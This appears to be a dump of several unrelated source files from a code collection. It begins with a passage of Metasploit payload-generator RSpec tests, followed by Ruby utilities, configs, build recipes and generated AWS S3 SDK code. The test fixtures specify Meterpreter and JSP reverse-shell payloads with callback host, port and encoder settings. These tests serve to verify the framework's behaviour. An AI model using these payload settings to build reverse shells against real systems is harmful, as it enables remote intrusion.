stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an InvalidFormat exception' do
expect{ payload_generator.generate_java_payload }.to raise_error(Msf::InvalidFormat)
end
end
context 'when format is raw' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'if the payload responds to generate_jar' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
it 'calls the generate_jar on the payload' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/meterpreter/reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate_jar).and_call_original
payload_generator.generate_java_payload
end
end
context 'if the payload does not respond to generate_jar' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
singles/java/jsp_shell_reverse_tcp
},
module_type: 'payload',
reference_name: 'java/jsp_shell_reverse_tcp'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/jsp_shell_reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls #generate' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/jsp_shell_reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate).and_call_original
payload_generator.generate_java_payload
end
end
end
context 'when format is a non-java format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'exe',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an InvalidFormat exception' do
expect{payload_generator.generate_java_payload}.to raise_error(Msf::InvalidFormat)
end
end
end
context '#generate_payload' do
let!(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls each step of the process' do
expect(payload_generator).to receive(:generate_raw_payload).and_call_original
expect(payload_generator).to receive(:add_shellcode).and_call_original
expect(payload_generator).to receive(:encode_payload).and_call_original
expect(payload_generator).to receive(:prepend_nops).and_call_original
expect(payload_generator).to receive(:format_payload).and_call_original
payload_generator.generate_payload
end
context 'when the payload is java' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls generate_java_payload' do
expect(payload_generator).to receive(:generate_java_payload).and_call_original
payload_generator.generate_payload
end
end
end
context 'when the payload exceeds the specified space' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: nil,
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 100,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'should raise an error' do
expect{payload_generator.generate_payload}.to raise_error(Msf::PayloadSpaceViolation, "The payload exceeds the specified space")
end
end
context 'when the payload format is invalid for the platform' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/osx/x86/reverse_tcp
stages/osx/x86/isight
},
module_type: 'payload',
reference_name: 'osx/x86/isight/reverse_tcp'
)
}
let(:generator_opts) {
{
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'elf',
framework: framework,
keep: false,
payload: 'osx/x86/isight/reverse_tcp',
stdin: nil,
}
}
it 'should raise an error' do
expect{payload_generator.generate_payload}.to raise_error(Msf::PayloadGeneratorError, "The payload could not be generated, check options")
end
end
end
| 33.45389 | 183 | 0.554292 |
bf8cb08b59227519d9c79d273e0ce11bb66c2750 | 3,767 | require 'spec_helper_acceptance'
test_name 'install tpm simulators'
describe 'install tpm_simulators' do
  # Implement any workarounds that are needed to run as service
  def implement_workarounds(hirs_host)
    # workaround for dbus config file mismatch error:
    # "dbus[562]: [system] Unable to reload configuration: Configuration file
    # needs one or more <listen> elements giving addresses"
    on hirs_host, 'systemctl restart dbus'
  end
  # Starts the TPM 2.0 simulator as the `tpm2sim` user in the background,
  # logging to /tmp/tpm2-simulator.log.
  def start_tpm2sim_on(hirs_host)
    on hirs_host, 'yum install -y tpm2-tools'
    on hirs_host, 'runuser tpm2sim --shell /bin/sh -c ' \
      '"cd /tmp; nohup /usr/local/bin/tpm2-simulator &> /tmp/tpm2-simulator.log &"', \
      pty: true, run_in_parallel: true
  end
  # Overrides the tpm2-abrmd systemd unit so the TAB/RM talks to the
  # simulator's socket instead of a hardware TPM, then (re)starts it if the
  # unit exists.
  def config_abrmd_for_tpm2sim_on(hirs_host)
    on hirs_host, 'mkdir -p /etc/systemd/system/tpm2-abrmd.service.d'
    # Configure the TAB/RM to talk to the TPM2 simulator
    extra_file=<<-SYSTEMD.gsub(/^\s*/,'')
      [Service]
      ExecStart=
      ExecStart=/sbin/tpm2-abrmd -t socket
    SYSTEMD
    create_remote_file hirs_host, '/etc/systemd/system/tpm2-abrmd.service.d/override.conf', extra_file
    on hirs_host, 'systemctl daemon-reload'
    on hirs_host, 'systemctl list-unit-files | grep tpm2-abrmd ' \
      + '&& systemctl restart tpm2-abrmd ' \
      + %q[|| echo "tpm2-abrmd.service not restarted because it doesn't exist"]
  end
  # start the tpm2sim and override tpm2-abrmd's systemd config use it
  # assumes the tpm2sim has been installed on the hosts
  def configure_tpm2_0_tools(hirs_host)
    start_tpm2sim_on(hirs_host)
    config_abrmd_for_tpm2sim_on(hirs_host)
  end
  # This is a helper to get the status of the TPM so it can be compared against the
  # the expected results.
  # Returns the [ownerAuthSet, endorsementAuthSet, lockoutAuthSet] triple
  # from the tpm2 structured fact.
  def get_tpm2_status(hirs_host)
    stdout = on(hirs_host, 'facter -p -y tpm2 --strict').stdout
    fact = YAML.safe_load(stdout)['tpm2']
    tpm2_status = fact['tpm2_getcap']['properties-variable']['TPM_PT_PERSISTENT']
    [tpm2_status['ownerAuthSet'],tpm2_status['endorsementAuthSet'],tpm2_status['lockoutAuthSet']]
  end
  # starts tpm 1.2 simulator services
  # Per the README file included with the source code, procedures for starting the tpm are:
  # Start the TPM in another shell after setting its environment variables
  # (TPM_PATH,TPM_PORT)
  # > cd utils
  # > ./tpmbios
  # Kill the TPM in the other shell and restart it
  def start_tpm_1_2_sim(hirs_host)
    os = fact_on(hirs_host,'operatingsystemmajrelease')
    on hirs_host, 'yum install -y trousers gcc tpm-tools'
    if os.eql?('7')
      on hirs_host, 'systemctl start tpm12-simulator'
      on hirs_host, 'systemctl start tpm12-tpmbios'
      on hirs_host, 'systemctl restart tpm12-simulator'
      on hirs_host, 'systemctl restart tpm12-tpmbios'
      on hirs_host, 'systemctl start tpm12-tpminit'
      on hirs_host, 'systemctl start tpm12-tcsd'
    # FIX: this was `else os.eql?('6')`, which evaluated and discarded the
    # condition so the EL6 branch ran for *any* non-EL7 OS. `elsif` restores
    # the intended EL7-vs-EL6 dispatch.
    elsif os.eql?('6')
      on hirs_host, 'service tpm12-simulator start '
      on hirs_host, 'service tpm12-tpmbios start '
      on hirs_host, 'service tpm12-simulator restart '
      on hirs_host, 'service tpm12-tpmbios start '
      on hirs_host, 'service tpm12-tpminit start '
      on hirs_host, 'service tpm12-tcsd start '
    end
  end
  context 'on a hirs host' do
    hosts_with_role(hosts, 'hirs').each do |hirs_host|
      # Using puppet_apply as a helper
      it 'should work with no errors' do
        if hirs_host.host_hash[:roles].include?('tpm_2_0')
          install_package(hirs_host,'simp-tpm2-simulator')
          implement_workarounds(hirs_host)
          configure_tpm2_0_tools(hirs_host)
        else
          install_package(hirs_host,'simp-tpm12-simulator')
          start_tpm_1_2_sim(hirs_host)
        end
      end
    end
  end
end
| 38.050505 | 102 | 0.701088 |
5d5db8917a00a345ca4cee0d465960becf101630 | 1,802 | class ViewCell
class << self
# load cell based on a name, pass context and optional vars
# ViewCell.get(:user, self) -> UserCell.new(self)
def get parent, name, vars={}
('%sCell' % name.to_s.classify)
.constantize
.new parent, vars
end
# delegate current scope methods to parent binding
# delegate :image_tag, :request, params
def delegate *list
list.each do |el|
define_method(el) { |*args, &block| parent.send(el, *args, &block) }
end
end
# = cell @users
# = cell @user
# = cell.user.render @user
# = cell(:user, user: @user).render
def cell parent, *args
if args.first
# covert to list of objects
unless [String, Symbol, Array].include?(args[0].class)
args[0] = [args.first]
end
out =
if args.first.class == Array
# cell @users
args.first.map do |object|
name = object.class.to_s.underscore.to_sym
ViewCell.get(parent, name).render object
end.join('')
else
# cell(:user, user: @user).profile
ViewCell.get parent, *args
end
out.respond_to?(:html_safe) ? out.html_safe : out
else
# cell.user.profile
ViewCell::Proxy.new(parent)
end
end
# can be called as a block or a method
# block do ...
# def block; super; ...
def before &block
define_method :before do
super() if self.class != ViewCell
instance_exec &block
end
end
# set or get template root directory
def template_root name=nil
if name
self.class.instance_variable_set :@template_root, name
else
self.class.instance_variable_get :@template_root
end
end
end
end
| 26.115942 | 76 | 0.577691 |
e86efd6d2654fb4a19477a2516f37cb3f3886c94 | 3,551 | # frozen_string_literal: true
module RuboCop
  module Cop
    module Rails
      # This cop checks dynamic `find_by_*` methods.
      # Use `find_by` instead of dynamic method.
      # See. https://rails.rubystyle.guide#find_by
      #
      # @example
      #   # bad
      #   User.find_by_name(name)
      #   User.find_by_name_and_email(name)
      #   User.find_by_email!(name)
      #
      #   # good
      #   User.find_by(name: name)
      #   User.find_by(name: name, email: email)
      #   User.find_by!(email: email)
      #
      # @example AllowedMethods: find_by_sql
      #   # bad
      #   User.find_by_query(users_query)
      #
      #   # good
      #   User.find_by_sql(users_sql)
      #
      # @example AllowedReceivers: Gem::Specification
      #   # bad
      #   Specification.find_by_name('backend').gem_dir
      #
      #   # good
      #   Gem::Specification.find_by_name('backend').gem_dir
      class DynamicFindBy < Cop
        MSG = 'Use `%<static_name>s` instead of dynamic `%<method>s`.'
        # Captures the column list (group 1) and an optional bang (group 2).
        METHOD_PATTERN = /^find_by_(.+?)(!)?$/.freeze
        # Registers an offense for any `find_by_<columns>` call unless the
        # invocation is explicitly allowed, or uses splat arguments (which
        # cannot be mapped onto keyword arguments safely).
        def on_send(node)
          return if allowed_invocation?(node)
          method_name = node.method_name
          static_name = static_method_name(method_name)
          return unless static_name
          return if node.arguments.any?(&:splat_type?)
          add_offense(node,
                      message: format(MSG, static_name: static_name,
                                      method: method_name))
        end
        # Safe-navigation calls (`user&.find_by_name`) are handled identically.
        alias on_csend on_send
        # Rewrites the call to `find_by`/`find_by!` with keyword arguments.
        # Bails out (no corrector) when the argument count does not match the
        # column count, since the mapping would be ambiguous.
        def autocorrect(node)
          keywords = column_keywords(node.method_name)
          return if keywords.size != node.arguments.size
          lambda do |corrector|
            autocorrect_method_name(corrector, node)
            autocorrect_argument_keywords(corrector, node, keywords)
          end
        end
        private
        # True when any of the three allow-lists exempts this call.
        def allowed_invocation?(node)
          allowed_method?(node) || allowed_receiver?(node) ||
            whitelisted?(node)
        end
        # Checks the method name against the AllowedMethods config option.
        def allowed_method?(node)
          return unless cop_config['AllowedMethods']
          cop_config['AllowedMethods'].include?(node.method_name.to_s)
        end
        # Checks the receiver source against the AllowedReceivers config option.
        def allowed_receiver?(node)
          return unless cop_config['AllowedReceivers'] && node.receiver
          cop_config['AllowedReceivers'].include?(node.receiver.source)
        end
        # config option `WhiteList` will be deprecated soon
        def whitelisted?(node)
          whitelist_config = cop_config['Whitelist']
          return unless whitelist_config
          whitelist_config.include?(node.method_name.to_s)
        end
        # Replaces the dynamic selector with `find_by`/`find_by!`.
        def autocorrect_method_name(corrector, node)
          corrector.replace(node.loc.selector,
                            static_method_name(node.method_name.to_s))
        end
        # Prefixes each positional argument with its matching `column:` keyword.
        def autocorrect_argument_keywords(corrector, node, keywords)
          keywords.each.with_index do |keyword, idx|
            corrector.insert_before(node.arguments[idx].loc.expression, keyword)
          end
        end
        # Splits `find_by_a_and_b` into ["a: ", "b: "] keyword prefixes.
        def column_keywords(method)
          keyword_string = method.to_s[METHOD_PATTERN, 1]
          keyword_string.split('_and_').map { |keyword| "#{keyword}: " }
        end
        # Returns static method name.
        # If code isn't wrong, returns nil
        def static_method_name(method_name)
          match = METHOD_PATTERN.match(method_name)
          return nil unless match
          match[2] ? 'find_by!' : 'find_by'
        end
      end
    end
  end
end
| 30.09322 | 80 | 0.595044 |
ff900b1c2fbad94eeb3ba722499b6e246015ae76 | 667 | # coding: utf-8
# Gem specification for the Hyperspace Jekyll theme (a port of the
# "Hyperspace" theme by HTML5 UP).
Gem::Specification.new do |spec|
  spec.name = "hyperspace_jekyll_theme"
  spec.version = "0.1.1"
  spec.authors = ["Andrew Banchich"]
  spec.email = ["[email protected]"]
  spec.summary = %q{A Jekyll version of the "Hyperspace" theme by HTML5 UP.}
  spec.homepage = "https://gitlab.com/andrewbanchich/hyperspace-jekyll-theme"
  spec.license = "MIT"
  # Package only the theme directories plus license/readme, taken from the
  # files git knows about (case-insensitive prefix match).
  spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{^(assets|_layouts|_includes|_sass|LICENSE|README)}i) }
  spec.add_development_dependency "jekyll", "~> 4.0"
  spec.add_development_dependency "bundler", "~> 2.1"
end
| 37.055556 | 132 | 0.643178 |
87af10cd05091697430f1202118fa3224a466536 | 1,473 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(:default, Rails.env)
module Myapp
  class Application < Rails::Application
    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.
    # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
    # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
    # config.time_zone = 'Central Time (US & Canada)'
    # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
    # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
    # config.i18n.default_locale = :de
    # Register the per-section theme bundles (not referenced from
    # application.css/js) so the asset pipeline precompiles them.
    config.assets.precompile += [ 'appviews.css', 'cssanimations.css', 'dashboards.css', 'forms.css', 'gallery.css', 'graphs.css', 'mailbox.css', 'miscellaneous.css', 'pages.css', 'tables.css', 'uielements.css', 'widgets.css', 'commerce.css' ]
    config.assets.precompile += [ 'appviews.js', 'cssanimations.js', 'dashboards.js', 'forms.js', 'gallery.js', 'graphs.js', 'mailbox.js', 'miscellaneous.js', 'pages.js', 'tables.js', 'uielements.js', 'widgets.js', 'commerce.js', 'metrics.js' ]
  end
end
| 52.607143 | 244 | 0.704005 |
08124fc729521b041741ea1864eb51f04196ca63 | 776 | workers = Integer(ENV['WEB_CONCURRENCY'] || 2)
# Thread-pool size comes from the environment so one config works across
# differently sized machines; min and max are pinned to the same value.
threads_count = Integer(ENV['RAILS_MAX_THREADS'] || 5)
threads threads_count, threads_count
# Load the app before forking workers (required for the on_worker_boot hook).
preload_app!
# NOTE(review): `DefaultRackup` was removed from Puma's config DSL in newer
# Puma releases and raises NameError there; rackup defaults to config.ru, so
# this line can likely be dropped — confirm the Puma version in use.
rackup DefaultRackup
port ENV['PORT'] || 3000
environment ENV['RACK_ENV'] || 'development'
# Re-establish the ActiveRecord connection in each forked worker; with
# preload_app! the parent's connection cannot be shared across fork.
on_worker_boot do
  require "active_record"
  # NOTE: the inline `rescue` catches any StandardError (the constant after
  # it is just the returned value, not a filter) — kept for compatibility
  # with the original best-effort disconnect.
  ActiveRecord::Base.connection.disconnect! rescue ActiveRecord::ConnectionNotEstablished
  # Fix: `rails_env` was never defined in this file, so worker boot raised
  # NameError. Derive the environment name the same way the `environment`
  # directive above does.
  rails_env = ENV['RACK_ENV'] || 'development'
  ActiveRecord::Base.establish_connection(YAML.load_file("#{Rails.root}/config/database.yml")[rails_env])
end
# Start PumaWorkerKiller in the master process before workers are forked:
# it polls worker RSS and restarts workers that exceed the RAM budget.
before_fork do
  PumaWorkerKiller.config do |config|
    config.ram = 512 # mb
    config.frequency = 5 # seconds
    config.percent_usage = 0.98
    config.rolling_restart_frequency = 12 * 3600 # 12 hours in seconds
  end
  PumaWorkerKiller.start
end
| 29.846154 | 105 | 0.731959 |
f8a6a4dcbaf9d50ef2b88f229e77d09e93d0fd67 | 1,965 | # frozen_string_literal: true
# Resolves which Sphinx indices a search should hit, given optional
# :indices, :classes and :references options. Enumerable over the
# resolved indices.
class ThinkingSphinx::IndexSet
  include Enumerable
  # Memoised mapping of a model class to its index reference symbol
  # (e.g. Admin::User -> :"admin/user").
  def self.reference_name(klass)
    @cached_results ||= {}
    @cached_results[klass.name] ||= klass.name.underscore.to_sym
  end
  delegate :each, :empty?, :to => :indices
  # @param options [Hash] :indices, :classes and/or :references filters
  # @param configuration [ThinkingSphinx::Configuration, nil] defaults to
  #   the global singleton configuration
  def initialize(options = {}, configuration = nil)
    @options = options
    @index_names = options[:indices] || []
    @configuration = configuration || ThinkingSphinx::Configuration.instance
  end
  # Superclasses (STI ancestors) of the requested classes, excluding the
  # requested classes themselves.
  def ancestors
    classes_and_ancestors - classes
  end
  def to_a
    indices
  end
  private
  attr_reader :configuration, :options
  # All known indices, ensuring index definitions have been loaded first.
  def all_indices
    configuration.preload_indices
    configuration.indices
  end
  def classes
    options[:classes] || []
  end
  # True when the caller constrained the set by class or by reference.
  def classes_specified?
    classes.any? || references_specified?
  end
  # Requested classes plus, for STI models, every ancestor class up to (but
  # not including) ActiveRecord::Base. Modules in the ancestor chain are
  # filtered out.
  def classes_and_ancestors
    @classes_and_ancestors ||= mti_classes + sti_classes.collect { |model|
      model.ancestors.take_while { |klass|
        klass != ActiveRecord::Base
      }.select { |klass|
        klass.class == Class
      }
    }.flatten
  end
  def index_names
    options[:indices] || []
  end
  # Resolution order: explicit index names win; otherwise filter by the
  # requested classes/references; otherwise use everything. Distributed
  # indices are excluded except when named explicitly.
  def indices
    return all_indices.select { |index|
      index_names.include?(index.name)
    } if index_names.any?
    everything = classes_specified? ? indices_for_references : all_indices
    everything.reject &:distributed?
  end
  def indices_for_references
    all_indices.select { |index| references.include? index.reference }
  end
  # Classes without an inheritance column: multiple-table inheritance roots,
  # which need no ancestor expansion.
  def mti_classes
    classes.reject { |klass|
      klass.column_names.include?(klass.inheritance_column)
    }
  end
  # Reference symbols to match against, either given explicitly or derived
  # from the requested classes and their STI ancestors.
  def references
    options[:references] || classes_and_ancestors.collect { |klass|
      ThinkingSphinx::IndexSet.reference_name(klass)
    }
  end
  def references_specified?
    options[:references] && options[:references].any?
  end
  # Classes with an inheritance column: STI models whose ancestors also map
  # to indices.
  def sti_classes
    classes.select { |klass|
      klass.column_names.include?(klass.inheritance_column)
    }
  end
end
| 21.129032 | 76 | 0.68855 |
b9c9208eb9a4e7593f424b1273b6079e57505dff | 260 | class CreateUsers < ActiveRecord::Migration[5.1]
def change
create_table :users do |t|
t.string :provider
t.string :uid
t.string :name
t.string :oauth_token
t.datetime :oauth_expires_at
t.timestamps
end
end
end
| 18.571429 | 48 | 0.642308 |
2641ce8a52c54aa19c03fd44803e7b484860561f | 1,083 | module PurchaseRequestsHelper
def i18n_pr_state(state)
case state
when 'pending'
t('purchase_request.pending')
when 'accepted'
t('purchase_request.not_ordered')
when 'rejected'
t('purchase_request.reject')
when 'ordered'
t('purchase_request.ordered')
end
end
def can_use_purchase_request?
role_can_use_purchase_request = SystemConfiguration.get("purchase_request.can_use")
if role_can_use_purchase_request == ''
return true
else
if user_signed_in?
case role_can_use_purchase_request
when 'Guest'
return true if ['Guest', 'User', 'Librarian', 'Administrator'].include?(current_user.role.name)
when 'User'
return true if ['User', 'Librarian', 'Administrator'].include?(current_user.role.name)
when 'Librarian'
return true if ['Librarian', 'Administrator'].include?(current_user.role.name)
when 'Administrator'
return true if ['Administrator'].include?(current_user.role.name)
end
end
end
false
end
end
| 30.083333 | 105 | 0.663897 |
08b6d66ef8fd1e79eab447101cdf3a614b1c64d4 | 134 | require 'spec_helper'
describe SlackGoogleBot do
  # Smoke test: the gem must expose a non-nil VERSION constant.
  it 'has a version' do
    expect(SlackGoogleBot::VERSION).to_not be nil
  end
end
| 16.75 | 49 | 0.753731 |
87d1b085055190cf982ce66bc103e495b19239f6 | 749 | name "poppler"
default_version "0.24.5"
# Checksum pin for the released tarball of this version.
version "0.24.5" do
  source md5: "334f2ac95cc8039f2a57fe63e4a81c69"
end
# Libraries poppler links against; omnibus builds these into the embedded
# prefix before this component.
dependency "fontconfig"
dependency "zlib"
dependency "libxml2"
dependency "curl"
dependency "libtiff"
dependency "libjpeg"
dependency "libpng"
dependency "lcms2"
# Encoding data files needed by poppler at runtime.
dependency "poppler-data"
source :url => "http://poppler.freedesktop.org/poppler-#{version}.tar.xz"
relative_path "poppler-#{version}"
build do
  # Standard omnibus compiler flags pointing at the embedded prefix.
  env = with_standard_compiler_flags(with_embedded_path)
  configure = [
    "./configure",
    "--prefix=#{install_dir}/embedded",
    "--enable-zlib",
    "--enable-libcurl",
    "--enable-cms=lcms2",
  ]
  command configure.join(" "), :env => env
  command "make -j #{workers}", :env => env
  # Fix: install with the same embedded build environment as the steps
  # above; previously `make install` ran without :env, so it could pick up
  # the system toolchain/PATH instead of the omnibus one.
  command "make install", :env => env
end
| 20.243243 | 73 | 0.70227 |
e990896c872bbabfa8ed37758b22a18b00d99d17 | 545 | require 'json'
# Read name/version/description from the package.json two directories up so
# the podspec stays in sync with the npm package metadata.
package = JSON.parse(File.read(File.join(__dir__, '../../package.json')))
Pod::Spec.new do |s|
  s.name = package['name']
  s.version = package['version']
  s.summary = package['description']
  s.authors = { "yiyi" => "[email protected]" }
  s.homepage = package['repository']['url']
  s.license = package['license']
  s.platform = :ios, "9.0"
  s.source = { :git => package['repository']['url'] }
  s.source_files = '**/*.{h,m}'
  # React Native native module: needs React headers plus the MQTT client.
  s.dependency 'React'
  s.dependency 'MQTTKit'
end
| 24.772727 | 73 | 0.572477 |
7978d07256e018fdab8e021a5b2445521c4f5865 | 67,674 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::S3
class Object
extend Aws::Deprecations
# @overload def initialize(bucket_name, key, options = {})
# @param [String] bucket_name
# @param [String] key
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :bucket_name
# @option options [required, String] :key
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@bucket_name = extract_bucket_name(args, options)
@key = extract_key(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def bucket_name
@bucket_name
end
# @return [String]
def key
@key
end
# Specifies whether the object retrieved was (true) or was not (false) a
# Delete Marker. If false, this response header does not appear in the
# response.
# @return [Boolean]
def delete_marker
data[:delete_marker]
end
# Indicates that a range of bytes was specified.
# @return [String]
def accept_ranges
data[:accept_ranges]
end
# If the object expiration is configured (see PUT Bucket lifecycle), the
# response includes this header. It includes the expiry-date and rule-id
# key-value pairs providing object expiration information. The value of
# the rule-id is URL encoded.
# @return [String]
def expiration
data[:expiration]
end
# If the object is an archived object (an object whose storage class is
# GLACIER), the response includes this header if either the archive
# restoration is in progress (see [RestoreObject][1] or an archive copy
# is already restored.
#
# If an archive copy is already restored, the header value indicates
# when Amazon S3 is scheduled to delete the object copy. For example:
#
# `x-amz-restore: ongoing-request="false", expiry-date="Fri, 23 Dec 2012
# 00:00:00 GMT"`
#
# If the object restoration is in progress, the header returns the value
# `ongoing-request="true"`.
#
# For more information about archiving objects, see [Transitioning
# Objects: General Considerations][2].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
# [2]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lifecycle-mgmt.html#lifecycle-transition-general-considerations
# @return [String]
def restore
data[:restore]
end
# The archive state of the head object.
# @return [String]
def archive_status
data[:archive_status]
end
# Creation date of the object.
# @return [Time]
def last_modified
data[:last_modified]
end
# Size of the body in bytes.
# @return [Integer]
def content_length
data[:content_length]
end
# An ETag is an opaque identifier assigned by a web server to a specific
# version of a resource found at a URL.
# @return [String]
def etag
data[:etag]
end
# This is set to the number of metadata entries not returned in
# `x-amz-meta` headers. This can happen if you create metadata using an
# API like SOAP that supports more flexible metadata than the REST API.
# For example, using SOAP, you can create metadata whose values are not
# legal HTTP headers.
# @return [Integer]
def missing_meta
data[:missing_meta]
end
# Version of the object.
# @return [String]
def version_id
data[:version_id]
end
# Specifies caching behavior along the request/reply chain.
# @return [String]
def cache_control
data[:cache_control]
end
# Specifies presentational information for the object.
# @return [String]
def content_disposition
data[:content_disposition]
end
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @return [String]
def content_encoding
data[:content_encoding]
end
# The language the content is in.
# @return [String]
def content_language
data[:content_language]
end
# A standard MIME type describing the format of the object data.
# @return [String]
def content_type
data[:content_type]
end
# The date and time at which the object is no longer cacheable.
# @return [Time]
def expires
data[:expires]
end
# @return [String]
def expires_string
data[:expires_string]
end
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @return [String]
def website_redirect_location
data[:website_redirect_location]
end
# If the object is stored using server-side encryption either with an
# AWS KMS customer master key (CMK) or an Amazon S3-managed encryption
# key, the response includes this header with the value of the
# server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @return [String]
def server_side_encryption
data[:server_side_encryption]
end
# A map of metadata to store with the object in S3.
# @return [Hash<String,String>]
def metadata
data[:metadata]
end
# If server-side encryption with a customer-provided encryption key was
# requested, the response will include this header confirming the
# encryption algorithm used.
# @return [String]
def sse_customer_algorithm
data[:sse_customer_algorithm]
end
# If server-side encryption with a customer-provided encryption key was
# requested, the response will include this header to provide round-trip
# message integrity verification of the customer-provided encryption
# key.
# @return [String]
def sse_customer_key_md5
data[:sse_customer_key_md5]
end
# If present, specifies the ID of the AWS Key Management Service (AWS
# KMS) symmetric customer managed customer master key (CMK) that was
# used for the object.
# @return [String]
def ssekms_key_id
data[:ssekms_key_id]
end
# Indicates whether the object uses an S3 Bucket Key for server-side
# encryption with AWS KMS (SSE-KMS).
# @return [Boolean]
def bucket_key_enabled
data[:bucket_key_enabled]
end
# Provides storage class information of the object. Amazon S3 returns
# this header for all objects except for S3 Standard storage class
# objects.
#
# For more information, see [Storage Classes][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @return [String]
def storage_class
data[:storage_class]
end
# If present, indicates that the requester was successfully charged for
# the request.
# @return [String]
def request_charged
data[:request_charged]
end
# Amazon S3 can return this header if your request involves a bucket
# that is either a source or a destination in a replication rule.
#
# In replication, you have a source bucket on which you configure
# replication and destination bucket or buckets where Amazon S3 stores
# object replicas. When you request an object (`GetObject`) or object
# metadata (`HeadObject`) from these buckets, Amazon S3 will return the
# `x-amz-replication-status` header in the response as follows:
#
# * If requesting an object from the source bucket — Amazon S3 will
# return the `x-amz-replication-status` header if the object in your
# request is eligible for replication.
#
# For example, suppose that in your replication configuration, you
# specify object prefix `TaxDocs` requesting Amazon S3 to replicate
# objects with key prefix `TaxDocs`. Any objects you upload with this
# key name prefix, for example `TaxDocs/document1.pdf`, are eligible
# for replication. For any object request with this key name prefix,
# Amazon S3 will return the `x-amz-replication-status` header with
# value PENDING, COMPLETED or FAILED indicating object replication
# status.
#
